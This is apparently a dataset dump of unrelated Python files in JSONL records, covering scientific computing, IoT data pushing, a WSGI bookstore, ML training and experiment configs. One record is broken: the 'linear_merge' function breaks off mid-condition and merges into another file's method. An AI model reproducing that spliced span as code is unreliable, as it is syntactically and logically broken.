np.argmax(band) + iband * np.argmin(band)\n if eref is None:\n global_extrema[tp]['energy'] = band[global_ext_idx]\n global_extrema[tp]['kpoint'] = hs_kpoints[global_ext_idx]\n extrema_idx = detect_peaks(band, mph=None, mpd=1,\n valley=ip==1)\n\n # making sure CBM & VBM are always included regardless of min_normdiff\n extrema_energies = [band[i] for i in extrema_idx]\n sorted_idx = np.argsort(extrema_energies)\n if tp=='p':\n sorted_idx = sorted_idx[::-1]\n extrema_idx = extrema_idx[sorted_idx]\n\n extrema_init = []\n for idx in extrema_idx:\n k_localext = hs_kpoints[idx]\n if abs(band[idx] - global_extrema[tp]['energy']) < Ecut[tp]:\n far_enough = True\n for kp in extrema_init:\n kp = np.array(kp)\n if norm(to_cart(get_closest_k(k_localext,\n np.vstack(\n (bs.get_sym_eq_kpoints(-kp),\n bs.get_sym_eq_kpoints(kp))),\n return_diff=True))) <= min_normdiff:\n far_enough = False\n if far_enough:\n extrema_init.append(k_localext)\n\n # check to see if one of the actual high-symm k-points can be used\n hisymks = list(hsk.kpath['kpoints'].values())\n all_hisymks = []\n for kp in hisymks:\n all_hisymks += list(np.vstack((bs.get_sym_eq_kpoints(-kp),\n bs.get_sym_eq_kpoints(kp))))\n for k_ext_found in extrema_init:\n kp = get_closest_k(k_ext_found, all_hisymks, return_diff=False)\n if norm(to_cart(kp - k_ext_found)) < min_normdiff/10.0:\n final_extrema[tp].append(kp)\n else:\n final_extrema[tp].append(k_ext_found)\n # sort the extrema based on their energy (i.e. importance)\n subband, _, _ = interpolate_bs(final_extrema[tp], interp_params, iband=iband,\n method=method, scissor=scissor,\n matrix=bs.structure.lattice.matrix,\n n_jobs=n_jobs, sgn=(-1) ** ip)\n sorted_idx = np.argsort(subband)\n if iband==0:\n sorted_idx = sorted_idx[::-1]\n final_extrema[tp] = [final_extrema[tp][i] for i in sorted_idx]\n\n if return_global:\n return final_extrema, global_extrema\n else:\n return final_extrema\n","sub_path":"amset/utils/band_interpolation.py","file_name":"band_interpolation.py","file_ext":"py","file_size_in_byte":15037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"73806021","text":"def remove_adjacent(lst):\n ans = []\n if len(lst)>0:\n ans.append(lst[0])\n for i in range(1,len(lst)):\n if lst[i] != lst[i-1]:\n ans.append(lst[i])\n\n return ans\n\n\ndef linear_merge(lst1, lst2):\n ans = []\n i = 0\n j = 0;\n while i < len(lst1) and j None:\n # TODO: Use API object/session\n\n # This ensures that any modifications are only local to this function, and do not affect the original (in case\n # it needs to be pushed back into the queue)\n\n timestamp_iso = arrow.get(readout_to_push['t']).isoformat()\n\n readout = deepcopy(readout_to_push)\n if self._dep.get('type') == 'api':\n # Push to API endpoint\n try:\n # Append offset between time that reading was taken and current time\n readout['m']['reading_offset'] = self.__get_reading_offset(\n readout)\n # Transform the device-based readout to the older API format\n readout = convert_to_api_payload(\n readout, self._node.config['readings'])\n logger.debug(f\"PUSH [API]. API-Based Readout: {readout}\")\n except:\n logger.exception(\n 'Could not construct final data payload to push')\n return False\n\n try:\n r = self._session.post(\n f\"https://{self._dep['config']['host']}/api/{self._dep['config']['apiver']}/nodes/{self._node.node_id}/data\",\n json=readout,\n timeout=self._node.config.get(\n 'push_timeout') or self._dep['config'].get('timeout') or 120\n )\n except requests.exceptions.ConnectionError:\n logger.warning(\n f\"Connection error while trying to push data at {timestamp_iso} to API.\")\n return False\n except requests.exceptions.Timeout:\n logger.warning(\n f\"Timeout error while trying to push data at {timestamp_iso} to API.\")\n return False\n except:\n logger.warning(\n f\"Exception while trying to push data at {timestamp_iso} to API.\", exc_info=True)\n return False\n\n if r.status_code != 200:\n logger.warning(\n f\"Error code {r.status_code} while trying to push data point at {timestamp_iso}.\")\n return False\n\n try:\n rtn = json.loads(r.text)\n except:\n logger.warning(\n f\"API response {r.text} could not be parsed as JSON\", exc_info=True)\n rtn = {}\n\n if rtn.get('newconfig'):\n logger.info(\n \"API response indicates new configuration is available. Requesting pull\")\n self._node.events.check_new_config.set()\n\n if rtn.get('newcommand'):\n logger.info(\n \"API response indicates command is available. Triggering check\")\n self._node.events.get_command.set()\n\n return True\n\n elif self._dep.get('type') == 'influxdb':\n try:\n # Append offset between time that reading was taken and current time\n readout['m']['reading_offset'] = self.__get_reading_offset(\n readout)\n # Transform the device-based readout to the older API format\n readout = convert_to_api_payload(\n readout, self._node.config['readings'])\n # Set measurement where data should be written\n readout['measurement'] = self._dep['meta']['measurement']\n except:\n logger.exception(\n 'Could not construct final data payload to push')\n return False\n\n r = None\n try:\n r = self._session.write_points([readout])\n except InfluxDBClientError as e:\n logger.error(f\"InfluxDB client error: {e}\")\n except InfluxDBServerError as e:\n logger.error(\n f\"InfluxDB server error for {self._dep.get('client_config')}: {e}\")\n except ConnectionRefusedError as e:\n logger.error(\n f\"InfluxDB server at {self._dep.get('client_config')} not available: {e}\")\n except:\n logger.exception(\n f\"Could not write to InfluxDB at {self._dep.get('client_config')}\")\n\n return r\n\n elif self._dep.get('type') == 'mqtt':\n # Append offset between time that reading was taken and current time\n readout['m']['reading_offset'] = self.__get_reading_offset(readout)\n logger.debug(f\"PUSH [mqtt] Device-based readout: {readout}\")\n return self._session.publish(readout)\n else:\n logger.warning(\n f\"Data endpoint type '{self._dep.get('type')}' not recognized\")\n\n @staticmethod\n def __get_reading_offset(readout: dict) -> int:\n return int(\n arrow.utcnow().float_timestamp -\n readout['t'] - readout['m']['reading_duration']\n )\n","sub_path":"src/data_mgmt/datapusher.py","file_name":"datapusher.py","file_ext":"py","file_size_in_byte":8794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"549466881","text":"from typing import List\nclass Solution:\n\tdef divisorGame(self, N: int) -> bool:\n\t\tdp = [False] * (N+1)\n\t\t\n\t\tfor i in range(2, N+1):\n\t\t\tfor j in range(1, i):\n\t\t\t\tif i % j == 0:\n\t\t\t\t\tif dp[i-j] == False:\n\t\t\t\t\t\tdp[i] = True\n\t\t\t\t\t\tbreak\n\n\t\treturn dp[N]\n\nif __name__ == '__main__':\n\tN = 2\n\tres = Solution().divisorGame(N)\n\tprint(res)\n\n\n\n","sub_path":"leetcode-algorithms/1025. Divisor Game/solutio.py","file_name":"solutio.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"288011860","text":"import random\nimport constants\nimport socket\n\nclass Node:\n \n class Neighbour:\n def __init__(self,neighbour_id, neighbour_port, neighbour_level):\n self.id = neighbour_id\n self.port = neighbour_port\n self.level = neighbour_level\n\n def __str__(self):\n return str(self.id) + \" port:\" + str(self.port) + \" level:\" + str(self.level) \n\n def __init__(self, unique_id, port):\n \"\"\"\n @param sock: of type socket\n \"\"\"\n self.id = unique_id\n self.port=port\n self.neighbours = list()\n self.parent = None\n self.level = None\n self.sock = None\n\n # self.sock.listen()\n\n # privilege of -1 indicates node is legitimate. \n # 0 will suggest rule 0 can be applied, 1 means rule 1 can be applied\n # 2 means rule 2 can be applied\n self.privilege = -1\n self.total_nodes = constants.TOTAL_NODES\n\n \n\n def __str__(self):\n return str(self.id) + \" port:\" + str(self.port) + \" level:\" + str(self.level) + \" parent:\" + str(self.parent)\n \n\n def print_neighbours(self):\n for node in self.neighbours:\n print(node)\n\n def add_neighbour(self,neighbour_id,neighbour_port,neighbour_level):\n neighbour = self.Neighbour(neighbour_id,neighbour_port,neighbour_level)\n self.neighbours.append(neighbour)\n\n def pick_parent(self):\n if self.parent is None:\n \n self.parent = random.choice(self.neighbours)\n\n elif isinstance(self.parent,str):\n for neigh in self.neighbours:\n if neigh.id == self.parent:\n self.parent = neigh\n break\n\n def check_privilege(self):\n # see neighbours and check if the node has privilege. If yes, send a message to daemon that node has privilege\n if (self.level > self.total_nodes):\n self.level = self.total_nodes\n\n if self.level < self.total_nodes:\n if self.level == self.parent.level + 1:\n # node is legit\n self.privilege = -1\n return\n else:\n if self.parent.level < self.total_nodes:\n # Rule 0\n # parent is correct. fix yourself\n self.privilege = 0\n return\n elif self.parent.level == self.total_nodes:\n # Rule 1\n # Parent is illegitimate. Make level same as parent\n self.privilege = 1\n return \n else:\n # parent.level > total_nodes\n # send parent message to fix self\n self.privilege = -2\n else:\n # self level is total_nodes\n # check if any of the neighbours have legit level. If yes, make them parent\n for n in self.neighbours:\n if n.level < self.total_nodes - 1:\n self.privilege = 3\n break\n\n def notify_central_daemon_of_privilege(self):\n if self.privilege >=0:\n print(f\"[NODE {self.id}]: Notifying CD\")\n try:\n self.sock.close()\n del(self.sock)\n print(f\"[NODE {self.id}]: try socket deleted\")\n\n except:\n pass\n\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.bind((constants.HOST,self.port))\n self.sock.connect((constants.HOST, constants.CENTRAL_DAEMON_PORT))\n privilege_str = f'privilege {self.privilege}'\n self.sock.sendall(privilege_str.encode('ASCII'))\n self.sock.close()\n del(self.sock)\n print(f\"[NODE {self.id}]: CD notified and socket destroyed\")\n\n\n def refresh_privilege(self):\n if self.parent:\n self.check_privilege()\n print(f\"[NODE {self.id}]: during refresh privilege {self.privilege}\")\n self.notify_central_daemon_of_privilege()\n\n print(f\"[NODE {self.id}]: After refresh privilege {self.privilege}\")\n\n def accept_data(self):\n \n conn,addr = self.sock.accept()\n with conn:\n print(f\"[Node {self.id}]:Connected by \", addr)\n \n data = conn.recv(1024)\n self.handle_rcv_data(addr,data)\n\n \n\n def listen(self):\n # print(f\"[Node {self.id}]: Socket status: {self.sock}\")\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.bind((constants.HOST,self.port))\n self.sock.listen()\n print(f\"[Node {self.id}]: listening\")\n while self.sock:\n self.accept_data()\n\n\n def handle_rcv_data(self,addr,data): \n decoded_data = data.decode()\n print(f\"[Node {self.id}]: received data\", decoded_data)\n \n if addr == constants.CENTRAL_DAEMON_PORT:\n # message from central daemon\n if decoded_data == \"privilege\":\n print(f\"[NODE {self.id}]: got privilege\")\n pass\n else:\n # messsage from neighbour\n split_message = decoded_data.split(' ')\n nid = split_message[0]\n nlevel = int(split_message[1])\n for n in self.neighbours:\n if n.id == nid:\n n.level = nlevel\n break\n\n self.refresh_privilege()\n \n\n def loop(self):\n print(f\"[Node {self.id}]: In loop\")\n self.listen() ","sub_path":"hons/slef stabalization trial/trial001/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"272662790","text":"\"\"\"Module that handles displaying of adventure-games story\"\"\"\nimport curses\nimport textwrap\n\n\nclass StoryScreen:\n \"\"\"Story Screen Class, can display parts of the games' story\"\"\"\n\n def __init__(self, screen):\n \"\"\"StoryScreen's init function\"\"\"\n # hold current screen\n self.screen = screen\n\n # Print the Story-Screen to given screen.\n def print(self):\n \"\"\"Prints story-screen\"\"\"\n screen_size = self.screen.getmaxyx()\n story_win = curses.newwin(screen_size[0], screen_size[1], 0, 0)\n story_win.addstr(1, 4, \"Story Name\")\n\n story_image = curses.newwin(\n int(screen_size[0] * 0.50), int(screen_size[1] - 5), 2, 3)\n story_image.border()\n story_win.addstr(\n int(screen_size[0] * 0.92), int(screen_size[1]*0.845),\n \"Weiter (w)\")\n\n text = \"Lorem ipsum dolor sit amet, consetetur \"\n text += \"et accusam et justo duo dolores et\"\n text += \"ea rebum. Stet clita kasd gubergren, no sea takimata\"\n text += \"sanctus est Lorem ipsum dolor sit amet.\"\n text += \"Lorem ipsum dolor sit amet, consetetur sadipscing\"\n text += \"elitr, sed diam nonumy eirmod tempor \"\n text += \"invidunt ut labore et dolore magn\"\n\n story = curses.newwin(int(screen_size[0] * 0.35),\n int(screen_size[1] - 5),\n int(1 + screen_size[0] * 0.55), 3)\n story_size = story.getmaxyx()\n story.border()\n\n story_content = curses.newwin(\n int(story_size[0] * 0.74), int(story_size[1]*0.95),\n int(screen_size[0] * 0.63), 5)\n story_content.addstr(1, 0, textwrap.fill(text, 750))\n self.screen.clear()\n story_win.refresh()\n story_image.refresh()\n story.refresh()\n story_content.refresh()\n","sub_path":"src/story.py","file_name":"story.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"2118273","text":"from celery import shared_task\nfrom subprocess import Popen, PIPE\nfrom challenge.models import Challenge, Release\nfrom django.utils import timezone\nimport requests\nimport datetime\nimport os\n\n\ndef get_release_version(endpoint):\n try:\n r = requests.head(endpoint)\n version_string = r.headers['ETag']\n version = version_string[3:-1]\n return version\n except Exception as e:\n print(e)\n date = timezone.now()\n return f'{date.year}_{date.month:02d}'\n \n@shared_task\ndef load_release(challenge_id):\n challenge = Challenge.objects.get(pk=challenge_id)\n version = get_release_version(challenge.sparql_endpoint)\n y, m = version.split('_')\n y, m = int(y), int(m)\n date = datetime.datetime(year=y, month=m, day=1)\n print('Release version', version)\n latest_release = challenge.get_latest_release()\n if latest_release is not None and latest_release.version == version:\n print('No new release')\n return\n \n release = Release(\n challenge=challenge,\n sparql_endpoint=challenge.sparql_endpoint,\n sparql_query=challenge.sparql_query,\n date=date,\n version=version)\n release.save()\n\n challenge.status = challenge.UPDATING\n challenge.save()\n \n # Load release data\n env = dict(os.environ)\n env['JAVA_OPTS'] = '-Xms2g -Xmx32g'\n p = Popen(['groovy', challenge.script, '-c', release.get_dir(),\n '-j', release.get_config_file(),], env=env)\n \n if p.wait() == 0:\n challenge.status = challenge.ACTIVE\n else:\n challenge.status = challenge.UPDATE_FAILED\n challenge.save()\n \n","sub_path":"biochallenge/apps/challenge/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"162381501","text":"#!/usr/bin/python\n'''\n (C) Copyright 2020 Intel Corporation.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\n GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE\n The Government's rights to use, modify, reproduce, release, perform, display,\n or disclose this software are subject to the terms of the Apache License as\n provided in Contract No. B609815.\n Any reproduction of computer software, computer software documentation, or\n portions thereof marked with this legend must also reproduce the markings.\n'''\nfrom __future__ import print_function\n\nimport subprocess\n\nfrom ClusterShell.NodeSet import NodeSet\nfrom apricot import TestWithServers, get_log_file\nfrom test_utils_pool import TestPool\nfrom fio_utils import FioCommand\nfrom command_utils import CommandFailure\nfrom dfuse_utils import Dfuse\n\n\nclass FioBase(TestWithServers):\n \"\"\"Base fio class.\n\n :avocado: recursive\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize a FioBase object.\"\"\"\n super(FioBase, self).__init__(*args, **kwargs)\n self.fio_cmd = None\n self.processes = None\n self.manager = None\n self.dfuse = None\n\n def setUp(self):\n \"\"\"Set up each test case.\"\"\"\n # obtain separate logs\n self.update_log_file_names()\n\n # Start the servers and agents\n super(FioBase, self).setUp()\n\n # Get the parameters for Fio\n self.fio_cmd = FioCommand()\n self.fio_cmd.get_params(self)\n self.processes = self.params.get(\"np\", '/run/fio/client_processes/*')\n self.manager = self.params.get(\"manager\", '/run/fio/*', \"MPICH\")\n\n def tearDown(self):\n \"\"\"Tear down each test case.\"\"\"\n try:\n self.dfuse = None\n finally:\n # Stop the servers and agents\n super(FioBase, self).tearDown()\n\n def _create_pool(self):\n \"\"\"Create a pool and execute Fio.\"\"\"\n # Get the pool params\n # pylint: disable=attribute-defined-outside-init\n self.pool = TestPool(self.context, dmg_command=self.get_dmg_command())\n self.pool.get_params(self)\n\n # Create a pool\n self.pool.create()\n\n def _create_cont(self):\n \"\"\"Create a TestContainer object to be used to create container.\"\"\"\n # TO-DO: Enable container using TestContainer object,\n # once DAOS-3355 is resolved.\n # Get Container params\n # self.container = TestContainer(self.pool)\n # self.container.get_params(self)\n\n # create container\n # self.container.create()\n env = Dfuse(self.hostlist_clients, self.tmp).get_default_env()\n # command to create container of posix type\n cmd = env + \"daos cont create --pool={} --svc={} --type=POSIX\".format(\n self.pool.uuid, \":\".join(\n [str(item) for item in self.pool.svc_ranks]))\n try:\n container = subprocess.Popen(cmd, stdout=subprocess.PIPE,\n shell=True)\n (output, err) = container.communicate()\n self.log.info(\"Container created with UUID %s\", output.split()[3])\n\n except subprocess.CalledProcessError as err:\n self.fail(\"Container create failed:{}\".format(err))\n\n return output.split()[3]\n\n def _start_dfuse(self):\n \"\"\"Create a DfuseCommand object to start dfuse.\"\"\"\n # Get Dfuse params\n self.dfuse = Dfuse(self.hostlist_clients, self.tmp,\n log_file=get_log_file(self.client_log),\n dfuse_env=self.basepath)\n self.dfuse.get_params(self)\n\n # update dfuse params\n self.dfuse.set_dfuse_params(self.pool)\n self.dfuse.set_dfuse_cont_param(self._create_cont())\n\n try:\n # start dfuse\n self.dfuse.run()\n except CommandFailure as error:\n self.log.error(\"Dfuse command %s failed on hosts %s\",\n str(self.dfuse), str(\n NodeSet.fromlist(self.dfuse.hosts)),\n exc_info=error)\n self.fail(\"Unable to launch Dfuse.\\n\")\n\n def execute_fio(self):\n \"\"\"Runner method for Fio.\"\"\"\n # Create a pool if one does not already exist\n if self.pool is None:\n self._create_pool()\n\n # start dfuse if api is POSIX\n if self.fio_cmd.api.value == \"POSIX\":\n # Connect to the pool, create container and then start dfuse\n # Uncomment below two lines once DAOS-3355 is resolved\n # self.pool.connect()\n # self.create_cont()\n self._start_dfuse()\n self.fio_cmd.update(\n \"global\", \"directory\", self.dfuse.mount_dir.value,\n \"fio --name=global --directory\")\n\n # Run Fio\n self.fio_cmd.hosts = self.hostlist_clients\n self.fio_cmd.run()\n","sub_path":"src/tests/ftest/util/fio_test_base.py","file_name":"fio_test_base.py","file_ext":"py","file_size_in_byte":5362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"5014746","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2019 Intel Corporation\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, version 3.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n\nfrom argparser import args\nfrom dataloader import DataGenerator\nfrom model import unet\nimport datetime\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport keras as K\n#from tensorflow import keras as K\n\nprint(\"Args = {}\".format(args))\n\nCHANNELS_LAST = True\n\nif CHANNELS_LAST:\n print(\"Data format = channels_last\")\nelse:\n print(\"Data format = channels_first\")\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\" # Get rid of the AVX, SSE warnings\nos.environ[\"OMP_NUM_THREADS\"] = str(args.intraop_threads)\nos.environ[\"KMP_BLOCKTIME\"] = str(args.blocktime)\nos.environ[\"KMP_AFFINITY\"] = \"granularity=thread,compact\"\n\n# os.system(\"lscpu\")\nstart_time = datetime.datetime.now()\nprint(\"Started script on {}\".format(start_time))\n\n#os.system(\"uname -a\")\nprint(\"TensorFlow version: {}\".format(tf.__version__))\nprint(\"Intel MKL-DNN is enabled = {}\".format(tf.pywrap_tensorflow.IsMklEnabled()))\n\nprint(\"Keras API version: {}\".format(K.__version__))\n\n# Optimize CPU threads for TensorFlow\nCONFIG = tf.ConfigProto(\n inter_op_parallelism_threads=args.interop_threads,\n intra_op_parallelism_threads=args.intraop_threads)\n\nSESS = tf.Session(config=CONFIG)\n\nK.backend.set_session(SESS)\n\nunet_model = unet(use_upsampling=args.use_upsampling,\n learning_rate=args.lr,\n n_cl_in=args.number_input_channels,\n n_cl_out=1, # single channel (greyscale)\n feature_maps = args.featuremaps,\n dropout=0.2,\n print_summary=args.print_model,\n channels_last = CHANNELS_LAST) # channels first or last\n\nunet_model.model.compile(optimizer=unet_model.optimizer,\n loss=unet_model.loss,\n metrics=unet_model.metrics)\n\n# Save best model to hdf5 file\nsaved_model_directory = os.path.dirname(args.saved_model)\ntry:\n os.stat(saved_model_directory)\nexcept:\n os.mkdir(saved_model_directory)\n\n# If there is a current saved file, then load weights and start from\n# there.\nif os.path.isfile(args.saved_model):\n unet_model.model.load_weights(args.saved_model)\n\ncheckpoint = K.callbacks.ModelCheckpoint(args.saved_model,\n verbose=1,\n save_best_only=True)\n\n# TensorBoard\ncurrentDT = datetime.datetime.now()\ntb_logs = K.callbacks.TensorBoard(log_dir=os.path.join(\n saved_model_directory, \"tensorboard_logs\", currentDT.strftime(\"%Y/%m/%d-%H:%M:%S\")), update_freq=\"batch\")\n\n# Keep reducing learning rate if we get to plateau\nreduce_lr = K.callbacks.ReduceLROnPlateau(monitor=\"val_loss\", factor=0.2,\n patience=5, min_lr=0.0001)\n\ncallbacks = [checkpoint, tb_logs, reduce_lr]\n\ntraining_data_params = {\"dim\": (args.patch_height, args.patch_width, args.patch_depth),\n \"batch_size\": args.bz,\n \"n_in_channels\": args.number_input_channels,\n \"n_out_channels\": 1,\n \"train_test_split\": args.train_test_split,\n \"validate_test_split\": args.validate_test_split,\n \"augment\": True,\n \"shuffle\": True,\n \"seed\": args.random_seed}\n\ntraining_generator = DataGenerator(\"train\", args.data_path,\n **training_data_params)\ntraining_generator.print_info()\n\nvalidation_data_params = {\"dim\": (args.patch_height, args.patch_width, args.patch_depth),\n \"batch_size\": 1,\n \"n_in_channels\": args.number_input_channels,\n \"n_out_channels\": 1,\n \"train_test_split\": args.train_test_split,\n \"validate_test_split\": args.validate_test_split,\n \"augment\": False,\n \"shuffle\": False,\n \"seed\": args.random_seed}\nvalidation_generator = DataGenerator(\"validate\", args.data_path,\n **validation_data_params)\nvalidation_generator.print_info()\n\n# Fit the model\n\"\"\"\nKeras Data Pipeline using Sequence generator\nhttps://www.tensorflow.org/api_docs/python/tf/keras/utils/Sequence\n\nThe sequence generator allows for Keras to load batches at runtime.\nIt's very useful in the case when your entire dataset won't fit into\nmemory. The Keras sequence will load one batch at a time to\nfeed to the model. You can specify pre-fetching of batches to\nmake sure that an additional batch is in memory when the previous\nbatch finishes processing.\n\nmax_queue_size : Specifies how many batches will be prepared (pre-fetched)\nin the queue. Does not indicate multiple generator instances.\n\nworkers, use_multiprocessing: Generates multiple generator instances.\n\nnum_data_loaders is defined in argparser.py\n\"\"\"\n\nunet_model.model.fit_generator(training_generator,\n epochs=args.epochs, verbose=1,\n validation_data=validation_generator,\n callbacks=callbacks,\n max_queue_size=args.num_prefetched_batches,\n workers=args.num_data_loaders,\n use_multiprocessing=True) #False) # True seems to cause fork issue\n\n# Evaluate final model on test holdout set\ntesting_generator = DataGenerator(\"test\", args.data_path,\n **validation_data_params)\ntesting_generator.print_info()\n\nscores = unet_model.model.evaluate_generator(testing_generator, verbose=1)\nprint(\"Final model metrics on test dataset:\")\nfor idx, name in enumerate(unet_model.model.metrics_names):\n print(\"{} \\t= {}\".format(name, scores[idx]))\n\nstop_time = datetime.datetime.now()\nprint(\"Started script on {}\".format(start_time))\nprint(\"Stopped script on {}\".format(stop_time))\nprint(\"\\nTotal time for training model = {}\".format(stop_time - start_time))\n","sub_path":"3D/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"465847016","text":"#!/usr/bin/python3\n#\n# main.py shows vl53l0x tof reading on ht16k33 7-segment display\n#\n\nimport time\n\nfrom vl53l0x.api import VL53L0X\nfrom ht16k33.api import HT16K33\n\nif __name__== \"__main__\":\n tof = VL53L0X()\n led = HT16K33()\n\n tof.setup()\n led.setup()\n\n rest = 0.1\n while True:\n distance = tof.measure()\n led.display(distance)\n time.sleep(rest)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"17005343","text":"# def hello ():\n# print (\"Hello world\")\n#\n#\n# hello()\n\n# def hello (name):\n# print (\"Hello\" + name)\n#\n#\n# hello(\"john\")\n#\ndef sum(a,b):\n c = a+b\n return c\n#\n#\n# x = sum(5,3)\n# print x\n#\n# print (sum(5,3))\n\n\na=3\nb=5\n\nprint (\"Sum of \" + str(a) + \" and \" + str(b) + \" is \" + str(sum(a,b)))\n","sub_path":"Olympiad Solutions/HW10/class 2.py","file_name":"class 2.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"64524329","text":"import logging\n\nformat=\"%(levelname)s: %(module)s, %(threadName)s, %(thread)d, %(message)s\"\nformater = logging.Formatter(format)\n\ndef QuConsolelogger(loggername, level):\t\n\tstreamH = logging.StreamHandler()\n\tlogger = logging.getLogger(loggername)\n\tstreamH.setFormatter(formater)\n\tlogger.addHandler(streamH)\n\tlogger.setLevel(level)\n\ndef QuFilelogger(loggername, level, fname):\n\tfileH = logging.FileHandler(fname, 'w+')\n\tlogger = logging.getLogger(loggername)\n\tfileH.setFormatter(formater)\n\tlogger.addHandler(fileH)\n\tlogger.setLevel(level)\n\n","sub_path":"py3lib/QuLogger.py","file_name":"QuLogger.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"632070479","text":"#!/usr/bin/env python\n\nimport asyncio\nimport websockets\nimport sys\n\npath = ''\nmsg = 'Ping'\nif len(sys.argv)>1: path = sys.argv[1]\nif len(sys.argv)>2: msg = ' '.join(sys.argv[2:])\n\n\nasync def hello():\n async with websockets.connect('ws://localhost:28000/{}'.format(path)) as websocket:\n await websocket.send(msg)\n try:\n print(await websocket.recv())\n except websockets.exceptions.ConnectionClosed:\n print(\"Connection closed.\")\n\nasyncio.get_event_loop().run_until_complete(hello())\n","sub_path":"testsock.py","file_name":"testsock.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"104255547","text":"result = open(\"courses.txt\",\"r\")\nsentence = result.readlines()\ndict = {}\nlist = []\ni=0\nfor count in sentence:\n\tdict[i] = count.strip()\n\tlist.append(count.strip())\n\ti=i+1\nprint(dict)\nprint(list)\n","sub_path":"Assignments/32.py","file_name":"32.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"453487779","text":"import re\n\nfrom bookdb import BookDB\n\nDB = BookDB()\n\nbase_url = \"localhost\"\nport = 8080\n\nurl = f\"http://{base_url}:{port}\"\n\n\ndef book(book_id):\n book_info = DB.title_info(book_id)\n if book_info is None:\n raise NameError\n response = f\"\"\"\n

{book_info.get('title')}

\n

Author: {book_info.get('author')}

\n

Publisher: {book_info.get('publisher')}

\n

ISBN: {book_info.get('isbn')}

\n

Back to List

\n \"\"\"\n\n response += \"\"\n\n return response\n\n\ndef books():\n response = \"\"\"

The Great Libary of Nemo

\n
    \"\"\"\n for title in DB.titles():\n response += (\n f\"\"\"
  • {title.get('title')}
  • \"\"\"\n )\n\n response += \"
\"\n\n return response\n\n\ndef resolve_path(path):\n funcs = {\n \"\": books,\n \"books\": books,\n \"book\": book,\n }\n\n path = path.strip(\"/\").split(\"/\")\n\n func_name = path[0]\n args = path[1:]\n\n try:\n func = funcs[func_name]\n except KeyError:\n raise NameError\n\n return func, args\n\n\ndef application(environ, start_response):\n status = \"200 OK\"\n headers = [(\"Content-type\", \"text/html\")]\n start_response(status, headers)\n\n try:\n if environ.get(\"PATH_INFO\") == \"/\":\n response_body = books()\n\n elif environ.get(\"PATH_INFO\") == \"/books\":\n response_body = books()\n\n elif environ.get(\"PATH_INFO\").startswith(\"/books/id\"):\n input_book_id = environ.get(\"PATH_INFO\").split(\"/\")[2]\n response_body = book(input_book_id)\n else:\n\n response_body = f\"\"\"\n {environ}\n \n \"\"\"\n except NameError:\n response_body = books()\n\n return [response_body.encode(\"utf8\")]\n\n\nif __name__ == \"__main__\":\n from wsgiref.simple_server import make_server\n\n srv = make_server(\"localhost\", 8080, application)\n srv.serve_forever()\n","sub_path":"bookapp.py","file_name":"bookapp.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"516269181","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n# conf.py sets all properties/parameters for the experiments.\n\n# The parameters consist of server(Cassandra) parameters, client(YCSB) parameters and algorithm parameters.\n# Attention!!!\n# Each parameter list better has its values in a partial order\n# So that the experimental results can be plotted in a reasonable way.\n\n# Set Cassandra/server ip list:\nip_list = ['127.0.0.61', '127.0.0.62', '127.0.0.61',\n '127.0.0.64', '127.0.0.65', '127.0.0.66',\n '127.0.0.67', '127.0.0.68', '127.0.0.69']\n\n# --> Set server parameters:\n# Attention:\n# These parameters are only suitable for Cassandra.\n# Among these, snitch_strategy_list, read_process_list, server_delay_in_ms_list are only applied for hacked Cassandra.\n\ntopology = \"'NetworkTopologyStrategy'\"\n# replica_factor_list = [\"'dc1' 